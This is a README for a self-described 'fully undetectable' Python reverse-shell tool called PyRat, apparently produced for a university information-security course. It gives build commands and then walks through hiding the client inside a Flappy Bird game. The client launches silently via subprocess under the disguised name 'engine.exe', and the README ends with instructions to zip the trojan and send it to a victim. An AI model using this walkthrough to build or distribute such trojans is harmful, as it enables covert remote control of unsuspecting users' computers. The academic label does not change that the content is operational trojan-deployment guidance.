A Fully Undetectable Python 3 Reverse Shell Script
Developed by Gerard Ian M. Balaoro
In Partial Fulfillment on the Requirements for the Subject
LIS 198: Information Security
1st Semester, A.Y. 2018-2019
University of the Philippines Diliman
The author intended this to be used solely for academic purposes
- Install required Python packages.
  pip install -r packages.txt
- Run the server script.
  python server.py --port 58777
- Configure server settings inside config.ini.
  { "host":"127.0.0.1", "port":58777 }
- Run client script in another computer.
- Server script
  pyinstaller server.py -F -y -i assets/icons/shell.ico --distpath "dist/PyRat" --name "PyRatServer"
- Client script, use the windowed option to prevent the script from launching a command window
  pyinstaller client.py -F -y -i assets/icons/gear.ico --distpath "dist/PyRat" --name "PyRatClient"
It's fairly easy to integrate this script into any Python application. In this example, we will use this Flappy Bird game recreated by Sourabh Verma using the PyGame library.
All we need to do is execute the client script silently whenever the game is initialized. We also need to think of an unsuspicious name
to use when compiling the client script; in this case, we're using 'engine.exe'. This can be accomplished using Python's subprocess
library:
import subprocess
payload = subprocess.Popen('engine', shell = True, stdout= None, stderr = None, stdin = None)
Run pyinstaller and copy the assets folder to the destination:
pyinstaller flappy.py -F -y -i assets/icons/flappy.ico --distpath "dist/FlappyBird" --name "flappybird" --windowed
xcopy "assets" "dist/FlappyBird/assets" /E /S /Y
Once done, we can now see our Trojan application inside the build/FlappyBird
directory. All that's left to do is to change the configuration settings, compress this to a zip file and send it to a victim.
.
├── ...
├── config.ini # Server settings
├── engine.exe # Concealed payload
├── flappybird.exe
└── ...
- This script is based on this article from WonderHowTo.com